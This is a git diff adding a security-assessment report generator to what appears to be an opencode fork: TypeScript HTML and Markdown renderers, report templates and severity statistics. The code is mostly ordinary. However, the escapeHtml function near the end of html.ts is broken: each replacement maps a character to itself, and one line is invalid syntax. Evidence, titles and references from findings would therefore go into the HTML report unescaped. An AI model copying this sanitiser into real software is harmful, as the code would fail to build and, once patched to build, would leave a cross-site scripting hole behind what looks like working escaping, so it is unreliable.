+          title: "Report generation failed",
+          output: `Failed to generate report: ${error}`,
+          metadata: {
+            reportId: "",
+            type: params.type,
+            format: params.format,
+            findings: 0,
+            severity: { critical: 0, high: 0, medium: 0, low: 0, info: 0, total: 0 },
+            outputFile: params.outputFile,
+            status: "failed",
+            error,
+          } as Record<string, unknown>,
+        }
+      }
+    },
+  }
+})
diff --git a/packages/opencode/src/pentest/reports/html.ts b/packages/opencode/src/pentest/reports/html.ts
new file mode 100644
index 00000000000..4dc9488534f
--- /dev/null
+++ b/packages/opencode/src/pentest/reports/html.ts
@@ -0,0 +1,735 @@
+/**
+ * @fileoverview HTML Report Generator
+ *
+ * Generates security assessment reports in HTML format with
+ * charts, styling, and interactive elements.
+ *
+ * @module pentest/reports/html
+ */
+
+import { PentestTypes } from "../types"
+import type { ReportData, ReportConfig, SeverityStats } from "./types"
+
+/**
+ * Generate an HTML report from report data.
+ */
+export function generateHtmlReport(data: ReportData): string {
+  const sections: string[] = []
+
+  sections.push(generateHtmlHeader(data))
+  sections.push("<body>")
+  sections.push('<div class="container">')
+
+  // Header section
+  sections.push(generateTitleSection(data))
+
+  // Executive Summary
+  if (data.config.includeExecutiveSummary) {
+    sections.push(generateExecutiveSummaryHtml(data))
+  }
+
+  // Scope
+  if (data.config.scope) {
+    sections.push(generateScopeSectionHtml(data.config))
+  }
+
+  // Methodology
+  if (data.config.includeMethodology) {
+    sections.push(generateMethodologySectionHtml(data.config))
+  }
+
+  // Findings Summary
+  sections.push(generateFindingsSummaryHtml(data))
+
+  // Detailed Findings
+  sections.push(generateDetailedFindingsHtml(data))
+
+  // Remediation Summary
+  if (data.config.includeRemediation) {
+    sections.push(generateRemediationSummaryHtml(data))
+  }
+
+  // Footer
+  sections.push(generateFooterHtml(data))
+
+  sections.push("</div>")
+  sections.push("</body>")
+  sections.push("</html>")
+
+  return sections.join("\n")
+}
+
+/**
+ * Generate HTML header with styles.
+ */
+function generateHtmlHeader(data: ReportData): string {
+  const customCss = data.config.customCss || ""
+
+  return `<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>${escapeHtml(data.config.title)}</title>
+  <style>
+    :root {
+      --critical: #dc2626;
+      --high: #ea580c;
+      --medium: #ca8a04;
+      --low: #16a34a;
+      --info: #2563eb;
+      --bg: #f8fafc;
+      --card-bg: #ffffff;
+      --text: #1e293b;
+      --text-muted: #64748b;
+      --border: #e2e8f0;
+    }
+
+    * {
+      box-sizing: border-box;
+      margin: 0;
+      padding: 0;
+    }
+
+    body {
+      font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', Arial, sans-serif;
+      background: var(--bg);
+      color: var(--text);
+      line-height: 1.6;
+      padding: 2rem;
+    }
+
+    .container {
+      max-width: 1200px;
+      margin: 0 auto;
+    }
+
+    h1, h2, h3, h4 {
+      margin-bottom: 1rem;
+      font-weight: 600;
+    }
+
+    h1 { font-size: 2.5rem; }
+    h2 { font-size: 1.75rem; border-bottom: 2px solid var(--border); padding-bottom: 0.5rem; margin-top: 2rem; }
+    h3 { font-size: 1.25rem; margin-top: 1.5rem; }
+    h4 { font-size: 1.1rem; }
+
+    p { margin-bottom: 1rem; }
+
+    .card {
+      background: var(--card-bg);
+      border-radius: 8px;
+      box-shadow: 0 1px 3px rgba(0,0,0,0.1);
+      padding: 1.5rem;
+      margin-bottom: 1.5rem;
+    }
+
+    .header-card {
+      background: linear-gradient(135deg, #1e3a5f 0%, #2d5a87 100%);
+      color: white;
+      text-align: center;
+      padding: 3rem 2rem;
+    }
+
+    .header-card h1 {
+      margin-bottom: 0.5rem;
+    }
+
+    .meta {
+      display: flex;
+      flex-wrap: wrap;
+      gap: 1rem;
+      justify-content: center;
+      margin-top: 1rem;
+      font-size: 0.9rem;
+      opacity: 0.9;
+    }
+
+    .meta-item {
+      background: rgba(255,255,255,0.1);
+      padding: 0.25rem 0.75rem;
+      border-radius: 4px;
+    }
+
+    .stats-grid {
+      display: grid;
+      grid-template-columns: repeat(auto-fit, minmax(150px, 1fr));
+      gap: 1rem;
+      margin: 1.5rem 0;
+    }
+
+    .stat-card {
+      text-align: center;
+      padding: 1.5rem;
+      border-radius: 8px;
+      color: white;
+    }
+
+    .stat-card.critical { background: var(--critical); }
+    .stat-card.high { background: var(--high); }
+    .stat-card.medium { background: var(--medium); }
+    .stat-card.low { background: var(--low); }
+    .stat-card.info { background: var(--info); }
+
+    .stat-number {
+      font-size: 2.5rem;
+      font-weight: bold;
+    }
+
+    .stat-label {
+      font-size: 0.85rem;
+      text-transform: uppercase;
+      opacity: 0.9;
+    }
+
+    .risk-badge {
+      display: inline-block;
+      padding: 0.5rem 1.5rem;
+      border-radius: 20px;
+      font-weight: bold;
+      font-size: 1.1rem;
+      margin: 1rem 0;
+    }
+
+    .risk-badge.critical { background: var(--critical); color: white; }
+    .risk-badge.high { background: var(--high); color: white; }
+    .risk-badge.medium { background: var(--medium); color: white; }
+    .risk-badge.low { background: var(--low); color: white; }
+    .risk-badge.info { background: var(--info); color: white; }
+
+    .severity-badge {
+      display: inline-block;
+      padding: 0.2rem 0.6rem;
+      border-radius: 4px;
+      font-size: 0.75rem;
+      font-weight: 600;
+      text-transform: uppercase;
+      color: white;
+    }
+
+    .severity-badge.critical { background: var(--critical); }
+    .severity-badge.high { background: var(--high); }
+    .severity-badge.medium { background: var(--medium); }
+    .severity-badge.low { background: var(--low); }
+    .severity-badge.info { background: var(--info); }
+
+    table {
+      width: 100%;
+      border-collapse: collapse;
+      margin: 1rem 0;
+    }
+
+    th, td {
+      padding: 0.75rem;
+      text-align: left;
+      border-bottom: 1px solid var(--border);
+    }
+
+    th {
+      background: var(--bg);
+      font-weight: 600;
+      font-size: 0.85rem;
+      text-transform: uppercase;
+      color: var(--text-muted);
+    }
+
+    tr:hover {
+      background: var(--bg);
+    }
+
+    .finding-card {
+      border-left: 4px solid var(--border);
+      margin-bottom: 1.5rem;
+    }
+
+    .finding-card.critical { border-left-color: var(--critical); }
+    .finding-card.high { border-left-color: var(--high); }
+    .finding-card.medium { border-left-color: var(--medium); }
+    .finding-card.low { border-left-color: var(--low); }
+    .finding-card.info { border-left-color: var(--info); }
+
+    .finding-header {
+      display: flex;
+      align-items: center;
+      gap: 1rem;
+      margin-bottom: 1rem;
+    }
+
+    .finding-title {
+      font-size: 1.1rem;
+      font-weight: 600;
+    }
+
+    .finding-meta {
+      display: grid;
+      grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
+      gap: 0.5rem;
+      margin: 1rem 0;
+      padding: 1rem;
+      background: var(--bg);
+      border-radius: 4px;
+      font-size: 0.9rem;
+    }
+
+    .finding-meta dt {
+      font-weight: 600;
+      color: var(--text-muted);
+    }
+
+    .evidence-block {
+      background: #1e293b;
+      color: #e2e8f0;
+      padding: 1rem;
+      border-radius: 4px;
+      font-family: monospace;
+      font-size: 0.85rem;
+      overflow-x: auto;
+      white-space: pre-wrap;
+      word-break: break-word;
+    }
+
+    .references {
+      list-style: none;
+      padding: 0;
+    }
+
+    .references li {
+      margin: 0.25rem 0;
+    }
+
+    .references a {
+      color: var(--info);
+      text-decoration: none;
+    }
+
+    .references a:hover {
+      text-decoration: underline;
+    }
+
+    .scope-list, .exclusion-list {
+      list-style: none;
+      padding: 0;
+    }
+
+    .scope-list li, .exclusion-list li {
+      padding: 0.5rem 0;
+      border-bottom: 1px solid var(--border);
+    }
+
+    .scope-list li:last-child, .exclusion-list li:last-child {
+      border-bottom: none;
+    }
+
+    .chart-container {
+      display: flex;
+      justify-content: center;
+      align-items: center;
+      gap: 0.5rem;
+      margin: 1rem 0;
+    }
+
+    .chart-bar {
+      height: 24px;
+      border-radius: 4px;
+      display: flex;
+      align-items: center;
+      justify-content: center;
+      color: white;
+      font-size: 0.75rem;
+      font-weight: 600;
+      min-width: 30px;
+    }
+
+    .footer {
+      text-align: center;
+      color: var(--text-muted);
+      font-size: 0.85rem;
+      margin-top: 3rem;
+      padding-top: 2rem;
+      border-top: 1px solid var(--border);
+    }
+
+    @media print {
+      body { padding: 0; }
+      .card { box-shadow: none; border: 1px solid var(--border); }
+      .header-card { background: #1e3a5f !important; -webkit-print-color-adjust: exact; print-color-adjust: exact; }
+    }
+
+    ${customCss}
+  </style>
+</head>`
+}
+
+/**
+ * Generate title section.
+ */
+function generateTitleSection(data: ReportData): string {
+  const meta: string[] = []
+
+  if (data.config.organization) {
+    meta.push(`<span class="meta-item">Client: ${escapeHtml(data.config.organization)}</span>`)
+  }
+  if (data.config.assessor) {
+    meta.push(`<span class="meta-item">Assessor: ${escapeHtml(data.config.assessor)}</span>`)
+  }
+  if (data.config.dateRange) {
+    const start = new Date(data.config.dateRange.start).toLocaleDateString()
+    const end = new Date(data.config.dateRange.end).toLocaleDateString()
+    meta.push(`<span class="meta-item">${start} - ${end}</span>`)
+  }
+  meta.push(`<span class="meta-item">Report ID: ${data.reportId}</span>`)
+
+  return `
+<div class="card header-card">
+  <h1>${escapeHtml(data.config.title)}</h1>
+  <div class="meta">
+    ${meta.join("\n    ")}
+  </div>
+</div>`
+}
+
+/**
+ * Generate executive summary HTML.
+ */
+function generateExecutiveSummaryHtml(data: ReportData): string {
+  const { severityStats } = data
+  const riskLevel = getRiskLevel(severityStats)
+
+  // Calculate bar widths for chart
+  const total = severityStats.total || 1
+  const widths = {
+    critical: (severityStats.critical / total) * 100,
+    high: (severityStats.high / total) * 100,
+    medium: (severityStats.medium / total) * 100,
+    low: (severityStats.low / total) * 100,
+    info: (severityStats.info / total) * 100,
+  }
+
+  return `
+<div class="card">
+  <h2>Executive Summary</h2>
+
+  <div style="text-align: center;">
+    <p style="margin-bottom: 0.5rem; color: var(--text-muted);">Overall Risk Assessment</p>
+    <span class="risk-badge ${riskLevel.toLowerCase()}">${riskLevel}</span>
+  </div>
+
+  <p style="margin-top: 1.5rem;">${getExecutiveSummaryText(severityStats)}</p>
+
+  <div class="stats-grid">
+    <div class="stat-card critical">
+      <div class="stat-number">${severityStats.critical}</div>
+      <div class="stat-label">Critical</div>
+    </div>
+    <div class="stat-card high">
+      <div class="stat-number">${severityStats.high}</div>
+      <div class="stat-label">High</div>
+    </div>
+    <div class="stat-card medium">
+      <div class="stat-number">${severityStats.medium}</div>
+      <div class="stat-label">Medium</div>
+    </div>
+    <div class="stat-card low">
+      <div class="stat-number">${severityStats.low}</div>
+      <div class="stat-label">Low</div>
+    </div>
+    <div class="stat-card info">
+      <div class="stat-number">${severityStats.info}</div>
+      <div class="stat-label">Info</div>
+    </div>
+  </div>
+
+  ${data.config.includeCharts ? `
+  <h3>Severity Distribution</h3>
+  <div class="chart-container">
+    ${severityStats.critical > 0 ? `<div class="chart-bar" style="width: ${Math.max(widths.critical, 8)}%; background: var(--critical);">${severityStats.critical}</div>` : ""}
+    ${severityStats.high > 0 ? `<div class="chart-bar" style="width: ${Math.max(widths.high, 8)}%; background: var(--high);">${severityStats.high}</div>` : ""}
+    ${severityStats.medium > 0 ? `<div class="chart-bar" style="width: ${Math.max(widths.medium, 8)}%; background: var(--medium);">${severityStats.medium}</div>` : ""}
+    ${severityStats.low > 0 ? `<div class="chart-bar" style="width: ${Math.max(widths.low, 8)}%; background: var(--low);">${severityStats.low}</div>` : ""}
+    ${severityStats.info > 0 ? `<div class="chart-bar" style="width: ${Math.max(widths.info, 8)}%; background: var(--info);">${severityStats.info}</div>` : ""}
+  </div>
+  ` : ""}
+</div>`
+}
+
+/**
+ * Get executive summary text based on findings.
+ */
+function getExecutiveSummaryText(stats: SeverityStats): string {
+  const criticalHigh = stats.critical + stats.high
+
+  if (criticalHigh > 0) {
+    return `This security assessment identified <strong>${stats.total} findings</strong>, including <strong>${criticalHigh} critical or high severity issues</strong> that require immediate attention. These vulnerabilities could potentially allow unauthorized access, data breaches, or system compromise if left unaddressed.`
+  } else if (stats.medium > 0) {
+    return `This security assessment identified <strong>${stats.total} findings</strong>, with <strong>${stats.medium} medium severity issues</strong> that should be addressed in the near term. While no critical vulnerabilities were found, the identified issues still present security risks that should be remediated.`
+  } else {
+    return `This security assessment identified <strong>${stats.total} findings</strong>. No critical or high severity vulnerabilities were discovered. The identified issues are primarily informational or low severity and represent opportunities for security hardening.`
+  }
+}
+
+/**
+ * Determine overall risk level.
+ */
+function getRiskLevel(stats: SeverityStats): string {
+  if (stats.critical > 0) return "CRITICAL"
+  if (stats.high > 0) return "HIGH"
+  if (stats.medium > 0) return "MEDIUM"
+  if (stats.low > 0) return "LOW"
+  return "INFO"
+}
+
+/**
+ * Generate scope section HTML.
+ */
+function generateScopeSectionHtml(config: ReportConfig): string {
+  if (!config.scope) return ""
+
+  return `
+<div class="card">
+  <h2>Scope</h2>
+
+  ${config.scope.description ? `<p>${escapeHtml(config.scope.description)}</p>` : ""}
+
+  <h3>In-Scope Targets</h3>
+  <ul class="scope-list">
+    ${config.scope.targets.map(t => `<li><code>${escapeHtml(t)}</code></li>`).join("\n    ")}
+  </ul>
+
+  ${config.scope.exclusions?.length ? `
+  <h3>Exclusions</h3>
+  <ul class="exclusion-list">
+    ${config.scope.exclusions.map(e => `<li>${escapeHtml(e)}</li>`).join("\n    ")}
+  </ul>
+  ` : ""}
+</div>`
+}
+
+/**
+ * Generate methodology section HTML.
+ */
+function generateMethodologySectionHtml(config: ReportConfig): string {
+  const methodology = config.methodology || `The security assessment was conducted using a combination of automated scanning tools and manual testing techniques. The methodology followed industry-standard practices including:
+
+<ol>
+  <li><strong>Reconnaissance</strong> - Information gathering and target enumeration</li>
+  <li><strong>Scanning</strong> - Automated vulnerability scanning and service detection</li>
+  <li><strong>Analysis</strong> - Manual verification and impact assessment of findings</li>
+  <li><strong>Reporting</strong> - Documentation of vulnerabilities and remediation guidance</li>
+</ol>
+
+<p>Tools used in this assessment may include: Nmap, Nikto, Nuclei, Gobuster, FFuf, SSLScan, and other industry-standard security testing tools.</p>`
+
+  return `
+<div class="card">
+  <h2>Methodology</h2>
+  ${config.methodology ? `<p>${escapeHtml(methodology)}</p>` : methodology}
+</div>`
+}
+
+/**
+ * Generate findings summary HTML.
+ */
+function generateFindingsSummaryHtml(data: ReportData): string {
+  const bySeverity = groupBySeverity(data.findings)
+  const severityOrder: PentestTypes.Severity[] = ["critical", "high", "medium", "low", "info"]
+
+  const rows: string[] = []
+  let index = 1
+
+  for (const severity of severityOrder) {
+    const findings = bySeverity[severity] || []
+    for (const finding of findings) {
+      const targetPort = finding.port ? `${finding.target}:${finding.port}` : finding.target
+      rows.push(`
+      <tr>
+        <td>${index}</td>
+        <td><span class="severity-badge ${finding.severity}">${finding.severity}</span></td>
+        <td>${escapeHtml(finding.title)}</td>
+        <td><code>${escapeHtml(targetPort)}</code></td>
+        <td>${finding.status}</td>
+      </tr>`)
+      index++
+    }
+  }
+
+  return `
+<div class="card">
+  <h2>Findings Summary</h2>
+
+  <table>
+    <thead>
+      <tr>
+        <th>#</th>
+        <th>Severity</th>
+        <th>Title</th>
+        <th>Target</th>
+        <th>Status</th>
+      </tr>
+    </thead>
+    <tbody>
+      ${rows.join("\n")}
+    </tbody>
+  </table>
+
+  ${data.findings.length === 0 ? "<p><em>No findings to report.</em></p>" : ""}
+</div>`
+}
+
+/**
+ * Generate detailed findings HTML.
+ */
+function generateDetailedFindingsHtml(data: ReportData): string {
+  const bySeverity = groupBySeverity(data.findings)
+  const severityOrder: PentestTypes.Severity[] = ["critical", "high", "medium", "low", "info"]
+
+  const sections: string[] = []
+  let findingNum = 1
+
+  for (const severity of severityOrder) {
+    const findings = bySeverity[severity] || []
+    if (findings.length === 0) continue
+
+    const findingCards = findings.map(f => formatFindingHtml(f, findingNum++, data.config.includeRemediation)).join("\n")
+
+    sections.push(`
+    <h3>${severity.toUpperCase()} Severity Findings</h3>
+    ${findingCards}`)
+  }
+
+  return `
+<div class="card">
+  <h2>Detailed Findings</h2>
+  ${sections.join("\n")}
+  ${data.findings.length === 0 ? "<p><em>No findings to report.</em></p>" : ""}
+</div>`
+}
+
+/**
+ * Format a single finding as HTML.
+ */
+function formatFindingHtml(finding: PentestTypes.Finding, num: number, includeRemediation: boolean): string {
+  const targetPort = finding.port ? `${finding.target}:${finding.port}` : finding.target
+
+  return `
+<div class="card finding-card ${finding.severity}">
+  <div class="finding-header">
+    <span class="severity-badge ${finding.severity}">${finding.severity}</span>
+    <span class="finding-title">${num}. ${escapeHtml(finding.title)}</span>
+  </div>
+
+  <div class="finding-meta">
+    <div><dt>Target</dt><dd><code>${escapeHtml(targetPort)}</code></dd></div>
+    <div><dt>Status</dt><dd>${finding.status}</dd></div>
+    ${finding.service ? `<div><dt>Service</dt><dd>${escapeHtml(finding.service)}</dd></div>` : ""}
+    ${finding.protocol ? `<div><dt>Protocol</dt><dd>${finding.protocol}</dd></div>` : ""}
+  </div>
+
+  <h4>Description</h4>
+  <p>${escapeHtml(finding.description)}</p>
+
+  ${finding.evidence ? `
+  <h4>Evidence</h4>
+  <div class="evidence-block">${escapeHtml(finding.evidence)}</div>
+  ` : ""}
+
+  ${finding.cve?.length ? `
+  <h4>CVE References</h4>
+  <ul class="references">
+    ${finding.cve.map(cve => `<li><a href="https://nvd.nist.gov/vuln/detail/${cve}" target="_blank">${cve}</a></li>`).join("\n    ")}
+  </ul>
+  ` : ""}
+
+  ${finding.references?.length ? `
+  <h4>References</h4>
+  <ul class="references">
+    ${finding.references.map(ref => `<li><a href="${escapeHtml(ref)}" target="_blank">${escapeHtml(ref)}</a></li>`).join("\n    ")}
+  </ul>
+  ` : ""}
+
+  ${includeRemediation && finding.remediation ? `
+  <h4>Remediation</h4>
+  <p>${escapeHtml(finding.remediation)}</p>
+  ` : ""}
+</div>`
+}
+
+/**
+ * Generate remediation summary HTML.
+ */
+function generateRemediationSummaryHtml(data: ReportData): string {
+  const criticalHigh = data.findings.filter(f => f.severity === "critical" || f.severity === "high")
+  const medium = data.findings.filter(f => f.severity === "medium")
+  const lowInfo = data.findings.filter(f => f.severity === "low" || f.severity === "info")
+
+  return `
+<div class="card">
+  <h2>Remediation Summary</h2>
+
+  ${criticalHigh.length > 0 ? `
+  <h3>Immediate Action Required</h3>
+  <p>The following issues should be addressed immediately:</p>
+  <ul>
+    ${criticalHigh.map(f => `<li><strong>${escapeHtml(f.title)}</strong>: ${escapeHtml(f.remediation || `Review and remediate this ${f.severity} severity issue.`)}</li>`).join("\n    ")}
+  </ul>
+  ` : ""}
+
+  ${medium.length > 0 ? `
+  <h3>Short-Term Remediation</h3>
+  <p>The following issues should be addressed within 30 days:</p>
+  <ul>
+    ${medium.map(f => `<li><strong>${escapeHtml(f.title)}</strong>: ${escapeHtml(f.remediation || `Review and remediate this medium severity issue.`)}</li>`).join("\n    ")}
+  </ul>
+  ` : ""}
+
+  ${lowInfo.length > 0 && lowInfo.some(f => f.remediation) ? `
+  <h3>Long-Term Improvements</h3>
+  <p>The following issues represent opportunities for security hardening:</p>
+  <ul>
+    ${lowInfo.filter(f => f.remediation).map(f => `<li><strong>${escapeHtml(f.title)}</strong>: ${escapeHtml(f.remediation!)}</li>`).join("\n    ")}
+  </ul>
+  ` : ""}
+</div>`
+}
+
+/**
+ * Generate footer HTML.
+ */
+function generateFooterHtml(data: ReportData): string {
+  return `
+<div class="footer">
+  ${data.config.footerContent ? `<p>${escapeHtml(data.config.footerContent)}</p>` : ""}
+  <p>Report generated by cyxwiz Security Assessment Platform</p>
+  <p>Report ID: ${data.reportId} | Generated: ${new Date(data.generatedAt).toLocaleString()}</p>
+</div>`
+}
+
+/**
+ * Group findings by severity.
+ */
+function groupBySeverity(findings: PentestTypes.Finding[]): Record<PentestTypes.Severity, PentestTypes.Finding[]> {
+  const result: Record<PentestTypes.Severity, PentestTypes.Finding[]> = {
+    critical: [],
+    high: [],
+    medium: [],
+    low: [],
+    info: [],
+  }
+
+  for (const finding of findings) {
+    result[finding.severity].push(finding)
+  }
+
+  return result
+}
+
+/**
+ * Escape HTML special characters.
+ */
+function escapeHtml(text: string): string {
+  return text
+    .replace(/&/g, "&")
+    .replace(/</g, "<")
+    .replace(/>/g, ">")
+    .replace(/"/g, """)
+    .replace(/'/g, "'")
+}
diff --git a/packages/opencode/src/pentest/reports/index.ts b/packages/opencode/src/pentest/reports/index.ts
new file mode 100644
index 00000000000..a441782c7ec
--- /dev/null
+++ b/packages/opencode/src/pentest/reports/index.ts
@@ -0,0 +1,325 @@
+/**
+ * @fileoverview Security Report Generator
+ *
+ * Generates security assessment reports from findings and scan data.
+ * Supports Markdown, HTML, and JSON output formats.
+ *
+ * @module pentest/reports
+ */
+
+import { randomBytes } from "crypto"
+import { PentestTypes } from "../types"
+import { Findings } from "../findings"
+import type {
+  ReportConfig,
+  ReportData,
+  ReportFormat,
+  SeverityStats,
+  StatusStats,
+  GeneratedReport,
+} from "./types"
+import { generateMarkdownReport } from "./markdown"
+import { generateHtmlReport } from "./html"
+
+export * from "./types"
+export { generateMarkdownReport } from "./markdown"
+export { generateHtmlReport } from "./html"
+
+/**
+ * Generate a unique report ID.
+ */
+function generateReportId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(6).toString("hex")
+  return `report_${timestamp}_${random}`
+}
+
+/**
+ * Security report generator namespace.
+ */
+export namespace Reports {
+  /**
+   * Generate a security assessment report.
+   *
+   * @param config - Report configuration
+   * @param options - Generation options
+   * @returns Generated report
+   *
+   * @example
+   * ```typescript
+   * const report = await Reports.generate({
+   *   title: "Q4 Security Assessment",
+   *   type: "executive",
+   *   format: "html",
+   *   organization: "Acme Corp",
+   *   scope: {
+   *     targets: ["192.168.1.0/24", "https://app.acme.com"],
+   *   },
+   * })
+   *
+   * // Write to file
+   * await Bun.write("report.html", report.content)
+   * ```
+   */
+  export async function generate(
+    config: Partial<ReportConfig>,
+    options: {
+      /** Specific findings to include (if not provided, fetches from storage) */
+      findings?: PentestTypes.Finding[]
+      /** Specific scans to include */
+      scans?: PentestTypes.ScanResult[]
+      /** Session ID to filter findings */
+      sessionID?: string
+      /** Storage mode for fetching findings */
+      storage?: "file" | "memory"
+    } = {}
+  ): Promise<GeneratedReport> {
+    // Apply defaults
+    const fullConfig: ReportConfig = {
+      title: "Security Assessment Report",
+      type: "technical",
+      format: "markdown",
+      includeRawData: false,
+      includeRemediation: true,
+      includeExecutiveSummary: true,
+      includeMethodology: true,
+      includeCharts: true,
+      ...config,
+    }
+
+    // Get findings
+    let findings = options.findings || []
+    if (!options.findings) {
+      findings = await Findings.list(
+        { storage: options.storage || "file" },
+        options.sessionID ? { sessionID: options.sessionID } : undefined
+      )
+    }
+
+    // Apply severity filter
+    if (fullConfig.severityFilter) {
+      findings = filterBySeverity(findings, fullConfig.severityFilter)
+    }
+
+    // Apply status filter
+    if (fullConfig.statusFilter?.length) {
+      findings = findings.filter(f => fullConfig.statusFilter!.includes(f.status))
+    }
+
+    // Get scans if raw data is included
+    let scans = options.scans
+    if (fullConfig.includeRawData && !scans && options.sessionID) {
+      scans = await Findings.listScans(
+        { storage: options.storage || "file" },
+        { sessionID: options.sessionID }
+      )
+    }
+
+    // Calculate statistics
+    const severityStats = calculateSeverityStats(findings)
+    const statusStats = calculateStatusStats(findings)
+
+    // Build report data
+    const reportData: ReportData = {
+      config: fullConfig,
+      findings,
+      scans,
+      severityStats,
+      statusStats,
+      generatedAt: Date.now(),
+      reportId: generateReportId(),
+    }
+
+    // Generate report content
+    let content: string
+
+    switch (fullConfig.format) {
+      case "html":
+        content = generateHtmlReport(reportData)
+        break
+      case "json":
+        content = JSON.stringify(reportData, null, 2)
+        break
+      case "markdown":
+      default:
+        content = generateMarkdownReport(reportData)
+        break
+    }
+
+    return {
+      id: reportData.reportId,
+      title: fullConfig.title,
+      format: fullConfig.format,
+      content,
+      generatedAt: reportData.generatedAt,
+      stats: {
+        findings: findings.length,
+        scans: scans?.length || 0,
+        severity: severityStats,
+      },
+    }
+  }
+
+  /**
+   * Generate an executive summary report.
+   * This is a convenience method for generating a high-level report.
+   */
+  export async function generateExecutive(
+    config: Partial<ReportConfig>,
+    options: Parameters<typeof generate>[1] = {}
+  ): Promise<GeneratedReport> {
+    return generate(
+      {
+        ...config,
+        type: "executive",
+        includeRawData: false,
+        includeMethodology: false,
+        severityFilter: {
+          minSeverity: "medium", // Only show medium and above
+        },
+      },
+      options
+    )
+  }
+
+  /**
+   * Generate a technical report with full details.
+   */
+  export async function generateTechnical(
+    config: Partial<ReportConfig>,
+    options: Parameters<typeof generate>[1] = {}
+  ): Promise<GeneratedReport> {
+    return generate(
+      {
+        ...config,
+        type: "technical",
+        includeRawData: true,
+        includeRemediation: true,
+        includeMethodology: true,
+      },
+      options
+    )
+  }
+
+  /**
+   * Generate a compliance-focused report.
+   */
+  export async function generateCompliance(
+    config: Partial<ReportConfig>,
+    options: Parameters<typeof generate>[1] = {}
+  ): Promise<GeneratedReport> {
+    return generate(
+      {
+        ...config,
+        type: "compliance",
+        includeRemediation: true,
+        includeMethodology: true,
+        statusFilter: ["open", "confirmed"], // Only open issues
+      },
+      options
+    )
+  }
+
+  /**
+   * Generate reports in multiple formats at once.
+   */
+  export async function generateMultiple(
+    config: Partial<ReportConfig>,
+    formats: ReportFormat[],
+    options: Parameters<typeof generate>[1] = {}
+  ): Promise<GeneratedReport[]> {
+    const reports: GeneratedReport[] = []
+
+    for (const format of formats) {
+      const report = await generate({ ...config, format }, options)
+      reports.push(report)
+    }
+
+    return reports
+  }
+
+  /**
+   * Get available report templates.
+   */
+  export function getTemplates(): Array<{ id: string; name: string; description: string }> {
+    return [
+      {
+        id: "executive",
+        name: "Executive Summary",
+        description: "High-level overview for management, focusing on critical/high findings",
+      },
+      {
+        id: "technical",
+        name: "Technical Report",
+        description: "Detailed technical report with evidence and remediation steps",
+      },
+      {
+        id: "compliance",
+        name: "Compliance Report",
+        description: "Report formatted for compliance requirements, open issues only",
+      },
+      {
+        id: "full",
+        name: "Full Report",
+        description: "Complete report with all findings, scans, and raw data",
+      },
+    ]
+  }
+}
+
+/**
+ * Filter findings by severity.
+ */
+function filterBySeverity(
+  findings: PentestTypes.Finding[],
+  filter: ReportConfig["severityFilter"]
+): PentestTypes.Finding[] {
+  if (!filter) return findings
+
+  let filtered = findings
+
+  // Include filter
+  if (filter.include?.length) {
+    filtered = filtered.filter(f => filter.include!.includes(f.severity))
+  }
+
+  // Exclude filter
+  if (filter.exclude?.length) {
+    filtered = filtered.filter(f => !filter.exclude!.includes(f.severity))
+  }
+
+  // Minimum severity filter
+  if (filter.minSeverity) {
+    const severityOrder: PentestTypes.Severity[] = ["info", "low", "medium", "high", "critical"]
+    const minIndex = severityOrder.indexOf(filter.minSeverity)
+    filtered = filtered.filter(f => severityOrder.indexOf(f.severity) >= minIndex)
+  }
+
+  return filtered
+}
+
+/**
+ * Calculate severity statistics.
+ */
+function calculateSeverityStats(findings: PentestTypes.Finding[]): SeverityStats {
+  return {
+    critical: findings.filter(f => f.severity === "critical").length,
+    high: findings.filter(f => f.severity === "high").length,
+    medium: findings.filter(f => f.severity === "medium").length,
+    low: findings.filter(f => f.severity === "low").length,
+    info: findings.filter(f => f.severity === "info").length,
+    total: findings.length,
+  }
+}
+
+/**
+ * Calculate status statistics.
+ */
+function calculateStatusStats(findings: PentestTypes.Finding[]): StatusStats {
+  return {
+    open: findings.filter(f => f.status === "open").length,
+    confirmed: findings.filter(f => f.status === "confirmed").length,
+    mitigated: findings.filter(f => f.status === "mitigated").length,
+    false_positive: findings.filter(f => f.status === "false_positive").length,
+  }
+}
diff --git a/packages/opencode/src/pentest/reports/markdown.ts b/packages/opencode/src/pentest/reports/markdown.ts
new file mode 100644
index 00000000000..26178e3457d
--- /dev/null
+++ b/packages/opencode/src/pentest/reports/markdown.ts
@@ -0,0 +1,489 @@
+/**
+ * @fileoverview Markdown Report Generator
+ *
+ * Generates security assessment reports in Markdown format.
+ *
+ * @module pentest/reports/markdown
+ */
+
+import { PentestTypes } from "../types"
+import type { ReportData, ReportConfig, SeverityStats } from "./types"
+
+/**
+ * Generate a Markdown report from report data.
+ */
+export function generateMarkdownReport(data: ReportData): string {
+  const sections: string[] = []
+
+  // Title and metadata
+  sections.push(generateHeader(data))
+
+  // Executive Summary (if enabled)
+  if (data.config.includeExecutiveSummary) {
+    sections.push(generateExecutiveSummary(data))
+  }
+
+  // Scope section
+  if (data.config.scope) {
+    sections.push(generateScopeSection(data.config))
+  }
+
+  // Methodology section (if enabled)
+  if (data.config.includeMethodology) {
+    sections.push(generateMethodologySection(data.config))
+  }
+
+  // Findings Summary
+  sections.push(generateFindingsSummary(data))
+
+  // Detailed Findings
+  sections.push(generateDetailedFindings(data))
+
+  // Remediation Summary (if enabled)
+  if (data.config.includeRemediation) {
+    sections.push(generateRemediationSummary(data))
+  }
+
+  // Appendix with raw data (if enabled)
+  if (data.config.includeRawData && data.scans?.length) {
+    sections.push(generateAppendix(data))
+  }
+
+  // Footer
+  sections.push(generateFooter(data))
+
+  return sections.filter(Boolean).join("\n\n---\n\n")
+}
+
+/**
+ * Generate report header with title and metadata.
+ */
+function generateHeader(data: ReportData): string {
+  const lines: string[] = []
+
+  lines.push(`# ${data.config.title}`)
+  lines.push("")
+
+  if (data.config.organization) {
+    lines.push(`**Client:** ${data.config.organization}`)
+  }
+
+  if (data.config.assessor) {
+    lines.push(`**Assessor:** ${data.config.assessor}`)
+  }
+
+  if (data.config.dateRange) {
+    const start = new Date(data.config.dateRange.start).toLocaleDateString()
+    const end = new Date(data.config.dateRange.end).toLocaleDateString()
+    lines.push(`**Assessment Period:** ${start} - ${end}`)
+  }
+
+  lines.push(`**Report Generated:** ${new Date(data.generatedAt).toLocaleString()}`)
+  lines.push(`**Report ID:** ${data.reportId}`)
+
